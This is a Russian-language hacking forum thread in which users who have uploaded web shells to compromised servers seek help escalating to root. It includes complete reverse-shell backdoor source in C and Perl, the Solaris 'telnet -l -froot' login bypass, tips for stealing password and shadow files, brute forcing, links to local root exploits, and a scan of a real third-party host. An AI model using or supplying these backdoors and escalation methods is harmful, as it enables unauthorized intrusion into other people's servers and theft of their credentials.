Added by L0rd_Ha0S: Вопросы по поднятию прав, по использованию разного рода скриптов, вроде web-шеллов, биндшеллов, бэкконект, и т.п. - задавать сюда! НЕ РАЗРЕШАЕТСЯ - вопросы о сплойтах, для этого есть специальные темы!

В общем думаю не один сталкивался с такой ситуацией.. Взломали мы какую-нибудь CMS (не важно что)
И залили наш шел... НО прав на редиктирование ГРУБО говоря index.php нет(
Мой вопролс водится к тому, какие методы существую для поднятия прав на удаленом сервере. На самом деле тупой дефейс мне не нужен, просто хочу понять смысл..
Дак вот, мной был залит бек дур на серв (.pl) нет катом получул входящее соединение. В общем как мне поступать дальше ) Сервер управляется 5.4-RELEASE FreeBSD.

Посмотри статью Constantine
http://forum.antichat.ru/thread30813.html
Еще в разделе Статьи должно быть что-то по этой тематике.

Obormot
Во-первых нужно узнать, стоит ли на apache noexec. Если стоит, то ты никакой бинарник из под nobody запустить не сможешь. Если не стоит и система не патченная, то можно попробовать сплойт (http://milw0rm.com/exploits/1311) для этой ветки.
Почитай mysql-конфиги, возможно пасс оттуда подойдет на фтп.
Прочитай /etc/passwd, отсей аккаунты, имеющие шелл и попробуй их видом login=pass на фтп.
Ищи уязвимые демоны в системе (старые mysql, ftp, etc), уязвимости в которых позволяют повысить локальные привелегии.
В общем, способов существует масса, нужно только проявить фантазию.

Здравствуйте.
У меня вопрос примерно такой же. Залил р57 на серв, бэк коннект чет не контачит (вероятно кривые руки, неткатом слушаю порт, задаю в р57 ип, тыркаю кнопку и он виснет) может ли этому серв припятствовать? Есть ли другиt способы поднять права, или стащить /etc/shadow? Уж очень серв понравился)

Пробуй биндить как перловыми скриптами так и сишным.

Если твой комп в локальной сети, то есть ты выходишь через шлюз, то backconnect не получится. Вполне возможно, что на сервере правильно настроенный фаерволл, который блокирует любой неразрешенный явно траффик.
Попробуй запустить backconnect вручную с помощью этих скриптов.
Backconnect на С:

/*
oooo...oooo.oooooooo8.ooooooooooo
.8888o..88.888........88..888..88
.88.888o88..888oooooo.....888....
.88...8888.........888....888....
o88o....88.o88oooo888....o888o...
*********************************
**** Network security team ******
********* nst.void.ru ***********
*********************************
* Title: nsT BackConnect Backdoor v1.0
* Date: 09.04.2006
* Usage:
* client: nc -lp 9999
* server: ./backconnect <ip_client> 9999
*********************************
*/

#include <stdlib.h>
#include <stdio.h>
#include <error.h>
#include <string.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <resolv.h>

int main (int argc, char **argv) {
struct sockaddr_in sock;
int sd;
char command[256];

if (argc < 3) {
printf("%s <host> <port>\n", argv[0]);
return 1;
}

close(1);

if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
perror(argv[0]);
return 1;
}

bzero(&sock, sizeof(sock));

sock.sin_family = AF_INET;
sock.sin_port = htons(atoi(argv[2]));
inet_aton(argv[1], &sock.sin_addr);

if (connect(sd, (struct sockaddr *)&sock, sizeof(sock))) {
perror(argv[0]);
return 1;
}

close(2);
dup(sd);

bzero(command, 256);
while (recv(sd, command, 255, 0) && strncmp(command, "quit", 4)) {
system(command);
bzero(command, 256);
}

close(sd);
return 0;
}

Backconnect на Perl:

#!/usr/bin/perl
use IO::Socket;
#IRAN HACKERS SABOTAGE Connect Back Shell
#code by:LorD
#We Are :LorD-C0d3r-NT
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
# Resolving HostName
# Connecting... 127.0.0.1
# Spawning Shell
# Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 2121
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/sh';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print " Resolving HostName\n";
print " Connecting... $ARGV[0] \n";
print " Spawning Shell \n";
print " Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF


Если есть какие-то вопросы - не стесняйся задавать.

Что то, сколько ни пробовал, su -m nobody не дает прав nobody. Значит система пропатчена, или это работает только при настоящем ssh ?

При наличии терминала/псевдотерминала работает. По поводу поднятия прав - самый лучший вариант, конечно - чтение всяческих хисторей, пассвордов, конфигов. Кроме того, стоит поискать suid-бит на файлах, доступных на запись всем - такое тоже бывает. Ну и конечно суидные бинарники.

hsi
Именно через шлюз, чет я раньше не подумал(. Пробовал на серве порт открыть, р57 опять виснет и нифига... Буду читать всяческие хистори, пассворы, конфиги)
Оп просканировал только что порты, там бо2к на 54320-м висит и прокси элитный, часов 5 назад еще ниче не было)))
Есть ли бо2к под линух?

hsi
Именно через шлюз, чет я раньше не подумал(. Пробовал на серве порт открыть, р57 опять виснет и нифига... Буду читать всяческие хистори, пассворы, конфиги)
Оп просканировал только что порты, там бо2к на 54320-м висит и прокси элитный, часов 5 назад еще ниче не было)))
Есть ли бо2к под линух?
Бред... С чего ты взял что там именно bo2k? Это тебе nmap сказал? С какими параметрами ты сканировал? Порт TCP или UDP? Сканер ошибся, просто 54320 - дефолтный порт Back Orifice 2000. Уж сколько лет, а он покоя народу не даёт. Кстати, если даже сканер не ошибся (точнее он всё равно ошибся), то это, вероятно, какой-нибдуь простенький honeypot для отлова всяких мег0 хекк3р0в.
И ещё:
BO2K is the most powerful network administration tool available for the Microsoft environment, bar none.
А прокси теперь значит админы не могут для своих целей поднять?
И что значит по-твоему элитный? То что он не светит remote addr и useragent? Как ты это определил? Различные чекеры тоже ошибаются =)

Может конечно и бред... Но помойму у тебя инфпрмации слишком мало, чтоб делать такие заключения. Наблюдаю за сервом уже дней 5, раньше портов было открыто в 2 раза меньше.
Там дыр немерено... Помойму прост ктото вместе со мной там обитает...
Вот зацените-
21/tcp open ftp
22/tcp open ssh
25/tcp filtered smtp
42/tcp filtered nameserver
80/tcp open http
81/tcp filtered hosts2-ns
111/tcp filtered rpcbind
135/tcp filtered msrpc
137/tcp filtered netbios-ns
139/tcp filtered netbios-ssn
389/tcp filtered ldap
445/tcp filtered microsoft-ds
513/tcp open login
514/tcp open shell
636/tcp filtered ldapssl
1001/tcp filtered unknown
1022/tcp filtered unknown
1023/tcp filtered netvenuechat
1025/tcp filtered NFS-or-IIS
1080/tcp open socks
1433/tcp filtered ms-sql-s
2049/tcp filtered nfs
2766/tcp filtered listen
3128/tcp filtered squid-http
3268/tcp filtered globalcatLDAP
3269/tcp filtered globalcatLDAPssl
4045/tcp open lockd
4444/tcp filtered krb524
5800/tcp filtered vnc-http
5900/tcp filtered vnc
6667/tcp open irc
8080/tcp open elit
32776/tcp open sometimes-rpc15
32778/tcp open sometimes-rpc19
32779/tcp open sometimes-rpc21
32780/tcp open sometimes-rpc23
54320/tcp open bo2k
Еще портов 5 открыто было...
Почему ты думашь, что сканер ошибся?

Bac9l
Судя по портам - там windows. А что пишет веб-шелл рст? Если какой-то unix - то вполне возможно, что это honeypot.

2Bac9l
попробуй утилиту amap от THC, оредели баннеры сервисов, также отсканируй nmap c опциями -sV -O -vvv и отпишись здесь. Если это FreeBSD-сервер с таким количеством открытых портов, форумной репутацией бьюсь об заклад, что это подсава в виде honeypot.
Почему ты думашь, что сканер ошибся?
LOL =). MS Sql не будет крутиться под FreeBSD, как и bo2k (читай предыдущий мой пост). и т.д.

Bac9l
Судя по портам - там windows. А что пишет веб-шелл рст? Если какой-то unix - то вполне возможно, что это honeypot.
Может он обшибся? =)
Сервер управляется 5.4-RELEASE FreeBSD.
2Bac9l как ты это определил?

Про 5.4-RELEASE FreeBSD эт не я говорил... Серв на SunOS 5.10 Generic точно.
Вот че нмап сказал-


Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2007-03-10 01:12 MSK
Initiating SYN Stealth Scan against aux-209-217-33-203.oklahoma.net (209.217.33.203) [1663 ports] at 01:12
Discovered open port 22/tcp on 209.217.33.203
Discovered open port 80/tcp on 209.217.33.203
Discovered open port 21/tcp on 209.217.33.203
Discovered open port 32780/tcp on 209.217.33.203
Discovered open port 514/tcp on 209.217.33.203
Increasing send delay for 209.217.33.203 from 0 to 5 due to 39 out of 128 dropped probes since last increase.
Discovered open port 32779/tcp on 209.217.33.203
SYN Stealth Scan Timing: About 29.13% done; ETC: 01:13 (0:01:13 remaining)
Discovered open port 4045/tcp on 209.217.33.203
Discovered open port 32778/tcp on 209.217.33.203
Discovered open port 32776/tcp on 209.217.33.203
The SYN Stealth Scan took 75.38s to scan 1663 total ports.
Initiating service scan against 9 services on aux-209-217-33-203.oklahoma.net (209.217.33.203) at 01:13
The service scan took 5.84s to scan 9 services on 1 host.
Initiating RPCGrind Scan against aux-209-217-33-203.oklahoma.net (209.217.33.203) at 01:13
The RPCGrind Scan took 287.47s to scan 5 ports on aux-209-217-33-203.oklahoma.net (209.217.33.203).
For OSScan assuming port 21 is open, 1 is closed, and neither are firewalled
Host aux-209-217-33-203.oklahoma.net (209.217.33.203) appears to be up ... good.
Interesting ports on aux-209-217-33-203.oklahoma.net (209.217.33.203):
(The 1631 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.0a
22/tcp open ssh SunSSH 1.1 (protocol 2.0)
25/tcp filtered smtp
42/tcp filtered nameserver
80/tcp open http Apache httpd
81/tcp filtered hosts2-ns
111/tcp filtered rpcbind
135/tcp filtered msrpc
137/tcp filtered netbios-ns
139/tcp filtered netbios-ssn
389/tcp filtered ldap
445/tcp filtered microsoft-ds
514/tcp open shell?
636/tcp filtered ldapssl
1001/tcp filtered unknown
1022/tcp filtered unknown
1023/tcp filtered netvenuechat
1025/tcp filtered NFS-or-IIS
1433/tcp filtered ms-sql-s
2049/tcp filtered nfs
2766/tcp filtered listen
3128/tcp filtered squid-http
3268/tcp filtered globalcatLDAP
3269/tcp filtered globalcatLDAPssl
4045/tcp open nlockmgr 1-4 (rpc #100021)
4444/tcp filtered krb524
5800/tcp filtered vnc-http
5900/tcp filtered vnc
32776/tcp open metad 1-2 (rpc #100229)
32778/tcp open rpc.unknown
32779/tcp open rpc.metamedd 1 (rpc #100242)
32780/tcp open rpc
Device type: general purpose
Running: Sun Solaris 9
OS details: Sun Solaris 9
OS Fingerprint:
TSeq(Class=RI%gcd=2%SI=23F27%IPID=I%TS=100HZ)
T1(Resp=Y%DF=Y%W=C0B7%ACK=S++%Flags=AS%Ops=NNTMNW)
T2(Resp=N)
T3(Resp=N)
T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=N)
PU(Resp=Y%DF=Y%TOS=0%IPLEN=70%RIPTL=148%RID=E%RIPC K=E%UCK=F%ULEN=134%DAT=E)

Uptime 31.955 days (since Tue Feb 6 02:22:45 2007)
TCP Sequence Prediction: Class=random positive increments
Difficulty=147239 (Good luck!)
TCP ISN Seq. Numbers: 9E182FF0 9E26F16A 9E2D6746 9E34CDAE 9E46CB3A 9E4FAE7C
IPID Sequence Generation: Incremental

Nmap finished: 1 IP address (1 host up) scanned in 373.539 seconds
Raw packets sent: 2182 (87.6KB) | Rcvd: 1665 (66.9KB)
IRC и соксы исчезли) ну и еще че-то

Bac9l
Ты сказал, у тебя веб-шелл. Покажи вывод команды uname -a

SunOS jupiter 5.10 Generic_118833-33 sun4u sparc SUNW,Ultra-Enterprise.
Днем там еще телнет открыт был.

Не подскажешь, где webmin пароли хранит?

Читай конфиг - /etc/webmin/miniserv.conf
Там указано, какие пароли он использует - из файла /etc/webmin/miniserv.users или /usr/local/etc/webmin/miniserv.users, либо системную авторизацию unix /etc/shadow.

К /etc/webmin/ доступ закрыт, к /var/webmin/ тоже, есть ток /opt/webmin/ а там как я понял только скрипты.

Без рута ты их не прочитаешь.

SunOS jupiter 5.10 Generic_118833-33 sun4u sparc SUNW,Ultra-Enterprise.
Днем там еще телнет открыт был.

Вот и ответ! На солярке недавно багу нашли, позволяющую заходить по telnet любому юзеру не исползуя пароль вот таки макаром:
telnet -l "-froot" <ip>
Видимо, пока он был открыт - кто-то влез в неё, админ, обнаружив это, снёс демон in.telnetd и удалил весь срач, который оставил нерадивый хаксор. Хотя это мог и быть червь, который специально создан под данную уязвимость:
Новый червь распространяется через дыру в Solaris
01 марта 2007 года, 11:14
Текст: Владимир Парамонов

Специалисты компании Arbor Networks сообщили об обнаружении вредоносной программы, распространяющейся через дыру в операционной системе Sun Solaris.

Брешь, о которой идет речь, была выявлена в первой половине прошлого месяца. Задействовать дыру злоумышленник может через модуль Login, который позволяет дистанционно входить в операционную систему. В том случае, если разрешен протокол удаленного управления Telnet, нападающий при определенных условиях может получить доступ к атакуемому ПК без пароля. Уязвимость присутствует в операционных системах Solaris версий 10 и 11.

Как отмечают эксперты Arbor Networks, на днях в интернете были обнаружены несколько узлов, осуществляющих сканирование серверов Telnet. При обнаружении уязвимых систем на них загружается вредоносное программное обеспечение, которое затем выполняет ряд операций, нацеленных на саморазмножение. О том, выполняет ли червь какие-либо деструктивные действия, пока ничего не сообщается.

Защититься от возможных атак червя можно путем отключения протокола Telnet. Кроме того, компания Sun Microsystems выпустила специальную утилиту, которая позволяет очистить компьютеры с Solaris 10 и 11 от появившейся на днях вредоносной программы.

А насчёт вот этого:
Про 5.4-RELEASE FreeBSD эт не я говорил... Серв на SunOS 5.10 Generic точно.
Сорри, недоглядел. Кстати, как видишь, nmap ошибся. Такое часто случается, не стоит полагаться только на сканер - думай головой.

Есть один очень странный сервак. Залил на него phpremview и путишествую по папкам. Но! Если исправить какой-либо файл, потом обновить страницу, изменения не происходят. Аналогично нашел файлик с примерно таким содежанием echo "123" запускаю, выдается эха, но тока совсем другая. Что это за фишка такая и как с ней бороться?

У тебя скоре всего нету прав. Вообще phpremview довольно кривой скрипт. Юзай шелл от Электа. В новостях про него уже рассказывали. Он корректно работает с файлами.

У тебя скоре всего нету прав. Вообще phpremview довольно кривой скрипт. Юзай шелл от Электа. В новостях про него уже рассказывали. Он корректно работает с файлами.
нет, такая же фигня и r57 сохраняешь одно, а реально работает что-то совсем другое

покажи id
+
права на файл который хочешь изменить

FreeBSD 4.11-RELEASE #0
uid=65534 ( nobody ) gid=8080 ( apache )
-rw-rw----
system отключена
да, кстати, потом открываешь файл, там изменения сохранены, но даже если die() сделать вначале все равно работает какой то другой скрипт :-О

ты еще выведи пользователя и группу владельцев файла.
но сразу скажу он у тебя должен быть или владельцем или членом группы nobody..

если не так то он даже открывать его не будет

ты еще выведи пользователя и группу владельцев файла.
но сразу скажу он у тебя должен быть или владельцем или членом группы nobody..

если не так то он даже открывать его не будет
user1052 apache
Но совсем не понятно, почему открывать этот файл может, сохранять, но в браузере отображается не тот совсем

ну правильно. группа одна и та же.. а браузер ф5 пробовал? и кэш чистить :d

ну правильно. группа одна и та же.. а браузер ф5 пробовал? и кэш чистить :d
да блин, глупость это. Я файл новый создаю, а брозер его не видит. 404 возвращаеся
хоте физически он есть его править мона и тд...
может актуально, но не сообщал.
на одном аккуанте несколько сайтов хожу через соседний, по всем суб ходит, в основном никак. основной в папке htdocs

уверен что не бэкап, что сайт не левый и тд и тп, найди запись о нем в httpd.conf

уверен что не бэкап, что сайт не левый и тд и тп, найди запись о нем в httpd.conf
нашел. Это его рабочая директория
/pub/home/сайтег/htdocs
не понятно

хм... попробуй пропингуй этот сайт со своего компа (узнай ип сервака на котором расположен сайт) и сравни с ип сервака, на котором у тебя залит шелл и на котором ты делаешь изменения

хм... попробуй пропингуй этот сайт со своего компа (узнай ип сервака на котором расположен сайт) и сравни с ип сервака, на котором у тебя залит шелл и на котором ты делаешь изминения
Да, ты был прав... протупил я

Заметил на некоторых серверах по команде id получаю инфу о нахождении в нескольких группах, например:
$ id
uid=48(apache) gid=48(apache) groups=48(apache),505(administrator),506(webusers) ,508(trac)

при исполнении скриптов - они запускаются под группой 48(apache) , а как мне поднять права до группы webusers ?

заранее спасибо за ответ.

у тебя и так есть права группы webusers

залил скриптик ,на сайт, perl-овский. chmod 755. так когда к ниму обращаюсь мне его как обычный текст показывает, понимаю что лажа в конфигах апача! что можно сделать?

1)Владелец скрипта www-юзер(или от кого там сервак работавет)
2)На директорию, где скрипт лежит в httpd.conf опция ExecCGI должна быть.

ну ExecCGI можно в .htaccess прописать же, да?

а вот что с 1-м делать? я же nobody!

2.6.8-2-686-smp
and
2.4.29-grsec+w+fhs6b+gr0501+nfs+a32+++p4+sata+c4+gr2b-v6.189

как до рута добратся ?

посоветуйте быстрый брут для su (под ssh) с возможностью испльзовать словари и просто перебирать.

hydra ?

Нужен локальный брут
многие найденные скрипты не собирается а собранные на похожей системе не работает (((
может есть чтонит по проше типа на перл или одним файлом на C

Можно конечно и на пхп написать но я думаю скорость будет не та (

не собирается собранный на похожей системе не работает ((( может есть чтонит по проше типа на перл или одним файлом на C
hydra - один из лучших брутеров. Для брута ssh вполне пригоден, проверено на личном опыте. На что что хоть ругается при сборке?

2.6.8-2-686-smp
and
2.4.29-grsec+w+fhs6b+gr0501+nfs+a32+++p4+sata+c4+gr2b-v6.189

как до рута добратся ?
понимаю, что поздно, но Все же))
второй, к сожалению, никак. Ибо пропатчен всеми, какими только можно, grsec патчами)
первый:
Linux 2.6.11 -> Linux Kernel <= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c) (http://milw0rm.com/exploits/1397)
Linux Kernel < 2.4.36.9/2.6.27.5 Unix Sockets Local Kernel Panic Exploit
(http://milw0rm.com/exploits/7091)
Linux Kernel 2.4/2.6 bluez Local Root Privilege Escalation Exploit
(http://milw0rm.com/exploits/926)
---
и вообще советую поюзать милворм еще и под конкретный релиз оси, а не только под ядро)
---
cat /etc/*release*

Важная тема К первому новому сообщению Важно: Поднятие прав. Вопросы по использованию различных скриптов (любых, КРОМЕ ЭКСПЛОИТОВ!)

...

Заметил на некоторых серверах по команде id получаю инфу о нахождении в нескольких группах, например:
$ id
uid=48(apache) gid=48(apache) groups=48(apache),505(administrator),506(webusers) ,508(trac)

при исполнении скриптов - они запускаются под группой 48(apache) , а как мне поднять права до группы webusers ?

заранее спасибо за ответ.

оО,ещё как вариант удостовериться - ./etc/group

Ребята, такой вопрос:
имеется
Linux server 2.6.18-92.el5 #1 SMP EDT 2008 i686 i686 i386 GNU/Linux

Можно ли добраться до рута?

Ребята, такой вопрос:
имеется
Linux server 2.6.18-92.el5 #1 SMP EDT 2008 i686 i686 i386 GNU/Linux

Можно ли добраться до рута?

1) Есть ли физический доступ к машине?
2) Какие права у существующего пользователя?

FreeBSD 6.3
права www:*:80:80 через пхпшел ака ноубоди..

еще смущает такая строчка в пассвд:
clamav:*:156:156:Clam Antivirus:/nonexistent:/sbin/nologin

есть 2 хеша (.хтпассвд) от wheel пользователей, но не факт что подойдут.

куда копать?

На сервер (FreeBSD 7.0-RELEASE #0) залито 2 шелла: r57 и c99, пароль root'а мне известен из реквизитов подключения к базе MySQL и мне надо зайти под рута на этот сервер. К SSH и Telnet не подключается, если юзать back-connect и использовать команду su - он мне пишет: su: Sorry. Из всего этого возникает 2 вопроса:
1. Как мне можно отредактировать файл /etc/group, для того, что бы добавиться в группу wheel?
2. Как открыть SSH или Telnet соединение с сервером?

1) Никак, обычно на этот файл право на запись имеет только рут
2) Опять же наврядли. Посмотри нетстатом - может есть еще кактие либо открытые порты

22 порт открыт, то есть SSH на сервере есть, но не коннектит. Как я понимаю, скорее всего файрволл блочит соединения.
Как быть? Может в настройках PuTTy надо что-то сделать?

22 порт открыт, то есть SSH на сервере есть, но не коннектит. Как я понимаю, скорее всего файрволл блочит соединения.
Как быть? Может в настройках PuTTy надо что-то сделать?

Скорее всего запрещено под рутом по ссш.
Что именно "но не коннектит" ?
Попробуй в командной строке выполнить telnet тут_ип 22

Timeout соединения.

Люди добрые, мы сами не местные...
помогите, пожалуйста, кто чем может (советом добрым, либо сплойтом рабочим))))
Может подскажет кто то что еще можно предпринять на такой системе:
---------------------------
Linux 2.6.18-92
cpanel 11.24.4 (в саму панель доступа нет)
Pure-FTPd 1.0.21
Exim version 4.69 #1 built 05-Nov-2008 15:05:08
MySQL 5.0.67 (есть доступ под обычным юзером которому доступна только своя БД и information_schema с записями своих БД)

так же файлы с суид битом
userhelper
usernetctl
suphp
exim
suexec
newgrp
chfn
chage
quota
passwd
mount
pam_timestamp_check
cons.saver
------Ну и остальные стандартные и конечно же без права записи :(
safe_mode: ON PHP version: 5.2.8 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF
Disable functions : exec, popen, passthru, system, fsockopen, shell_exec, virtual, proc_close, proc_get_status, proc_open, proc_terminate

Через веб-шел на перле выполняется бекконнект.

Необходимо:
Либо рут, либо возможность просмотра каталогов другого юзера, либо просмотра БД другого юзера, либо shadow стянуть.
Уже 4 дня ломаю голову, пока ни чего толкового не получается

6994970 36 -r-sr-xr-x 1 root wheel 18332 Nov 19 2005 /bin/rcp
6995440 12 -r-sr-x--- 1 root operator 4912 Nov 19 2005 /sbin/mksnap_ffs
6995461 44 -r-sr-xr-x 1 root wheel 21792 Nov 19 2005 /sbin/ping
6995462 56 -r-sr-xr-x 1 root wheel 28660 Nov 19 2005 /sbin/ping6
6995474 20 -r-sr-x--- 1 root operator 10148 Nov 19 2005 /sbin/shutdown
6995595 44 -r-sr-xr-x 4 root wheel 20948 Nov 19 2005 /usr/bin/at
6995595 44 -r-sr-xr-x 4 root wheel 20948 Nov 19 2005 /usr/bin/atq
6995595 44 -r-sr-xr-x 4 root wheel 20948 Nov 19 2005 /usr/bin/atrm
6995595 44 -r-sr-xr-x 4 root wheel 20948 Nov 19 2005 /usr/bin/batch
6995617 36 -r-sr-xr-x 6 root wheel 17532 Nov 19 2005 /usr/bin/chpass
6995617 36 -r-sr-xr-x 6 root wheel 17532 Nov 19 2005 /usr/bin/chfn
6995617 36 -r-sr-xr-x 6 root wheel 17532 Nov 19 2005 /usr/bin/chsh
6995617 36 -r-sr-xr-x 6 root wheel 17532 Nov 19 2005 /usr/bin/ypchpass
6995617 36 -r-sr-xr-x 6 root wheel 17532 Nov 19 2005 /usr/bin/ypchfn
6995617 36 -r-sr-xr-x 6 root wheel 17532 Nov 19 2005 /usr/bin/ypchsh
6995688 16 -r-sr-xr-x 1 root wheel 7680 Nov 19 2005 /usr/bin/lock
6995691 36 -r-sr-xr-x 1 root wheel 17616 Nov 19 2005 /usr/bin/login
6995724 12 -r-sr-xr-x 1 root wheel 4128 Nov 19 2005 /usr/bin/opieinfo
6995726 24 -r-sr-xr-x 1 root wheel 10472 Nov 19 2005 /usr/bin/opiepasswd
6995728 12 -r-sr-xr-x 2 root wheel 5828 Nov 19 2005 /usr/bin/passwd
6995728 12 -r-sr-xr-x 2 root wheel 5828 Nov 19 2005 /usr/bin/yppasswd
6995738 20 -r-sr-xr-x 1 root wheel 10140 Nov 19 2005 /usr/bin/rlogin
6995742 16 -r-sr-xr-x 1 root wheel 8016 Nov 19 2005 /usr/bin/rsh
6995756 24 -r-sr-xr-x 1 root wheel 11992 Nov 19 2005 /usr/bin/su
6995821 52 -r-sr-xr-x 1 root wheel 25376 Nov 19 2005 /usr/bin/crontab
6995825 52 -r-sr-sr-x 1 root daemon 24752 Nov 19 2005 /usr/bin/lpq
6995826 56 -r-sr-sr-x 1 root daemon 27668 Nov 19 2005 /usr/bin/lpr
6995827 48 -r-sr-sr-x 1 root daemon 23280 Nov 19 2005 /usr/bin/lprm
6997917 8 -r-sr-xr-x 1 root wheel 3400 Nov 19 2005 /usr/libexec/pt_chown
7018529 32 -r-sr-sr-x 1 root authpf 14724 Nov 19 2005 /usr/sbin/authpf
7018630 32 -r-sr-xr-x 1 root wheel 15844 Nov 19 2005 /usr/sbin/mrinfo
7018632 60 -r-sr-xr-x 1 root wheel 30452 Nov 19 2005 /usr/sbin/mtrace
7018869 672 -r-sr-x--- 1 root network 324192 Nov 19 2005 /usr/sbin/ppp
7018871 192 -r-sr-x--- 1 root dialer 96760 Nov 19 2005 /usr/sbin/pppd
7018905 24 -r-sr-x--- 1 root network 11636 Nov 19 2005 /usr/sbin/sliplogin
7018919 32 -r-sr-xr-x 1 root wheel 14908 Nov 19 2005 /usr/sbin/timedc
7018920 40 -r-sr-xr-x 1 root wheel 19168 Nov 19 2005 /usr/sbin/traceroute
7018921 32 -r-sr-xr-x 1 root wheel 16212 Nov 19 2005 /usr/sbin/traceroute6



Вот все суидные файлы.Что смотреть лучше,если это что-то даёт?)) (юзал find all suid files) )

ЗЫ: Ни бэкконнектни бинд не проходит =_=

Привет всем ребята кто знает как получить рут на FreeBSD 6.2-RELEASE
есть шел но только на чтение www

massovka, тебе на этот вопрос уже 10000 раз отвечали.

massovka, тебе на этот вопрос уже 10000 раз отвечали.

да давали линки на експлоиты ни один не подходит! я перерил весь гугл и вижу что не только у меня проблема с 6.2 что НЕТ нормального есплоита

что НЕТ нормального есплоита
в паблике может и нету

в паблике может и нету

а где можно найти нормальный? ;) ;)

а где можно найти нормальный? ;) ;)
securitylab.ru, milw0rm.org, securityfocus.com, packetstormsecurity.org, securityvulns.ru

https://forum.antichat.ru/showpost.php?p=1191388&postcount=730 :cool:

Есть ли возможность выхода за пределы chroot?
Система: FreeBSD 6.2
PHP/5.2.4

http://milw0rm.com/exploits/7091

что этотсплойи делает?? какие права дает? ?

В заголовке написано:
Linux Kernel < 2.4.36.9/2.6.27.5 Unix Sockets Local Kernel Panic Exploit

читать я умею...
что этот кернел паник значит для системы? как я понимаю крах?

читать я умею...
что этот кернел паник значит для системы? как я понимаю крах?
Да.

подскажите, какими способами запустить сплойт на перле или Си кроме как удаленного коннекта через бинд и листен? (например через шелл?)

---Perl---
perl scripl.pl

---C---
gcc script.c -o script
./script

как запускать я знаю. вопрос заключался в том. через что вводить эти команды: обязательно коннектится через netcat или можно просто через шелл например.

Появился еще один вопросец: ввожу команду netstat -an | grep -i listen (просмотреть порты) показывает
tcp4 0 0 *.8767 *.* LISTEN
это как раз тот порт который я забиндил, но через неткат все равно не коннектится! В чем может быть дело?

в фаерволе

в моем или серверном?)

просто дело в том, что я тот же самый порт попробовал на другом серваке и коннектится нормально....

в серверном

и можно ли в данном случае чтонибудь сделать?

сделать бекконект мб?
https://forum.antichat.ru/search.php

так неткатом не коннектится!!

на
OS version: Linux version 2.6.18-164.15.1.el5PAE (mockbuild@builder16.centos.org) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-46)) #1 SMP Wed Mar 17 12:14:29 EDT 2010
ченить есть?

можно глупый поврос.
допустим у меня uid=username2 gid=username2 а как можно сменить права допустим на username3 и возможноли вообще...

можно глупый поврос.
допустим у меня uid=username2 gid=username2 а как можно сменить права допустим на username3 и возможноли вообще...

=) Можно выполнять от имени пользователя, через команду su, естественно зная его пароль.

на
OS version: Linux version 2.6.18-164.15.1.el5PAE (mockbuild@builder16.centos.org) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-46)) #1 SMP Wed Mar 17 12:14:29 EDT 2010
ченить есть?

Дата сборки 2010. Врядли что то его ударит.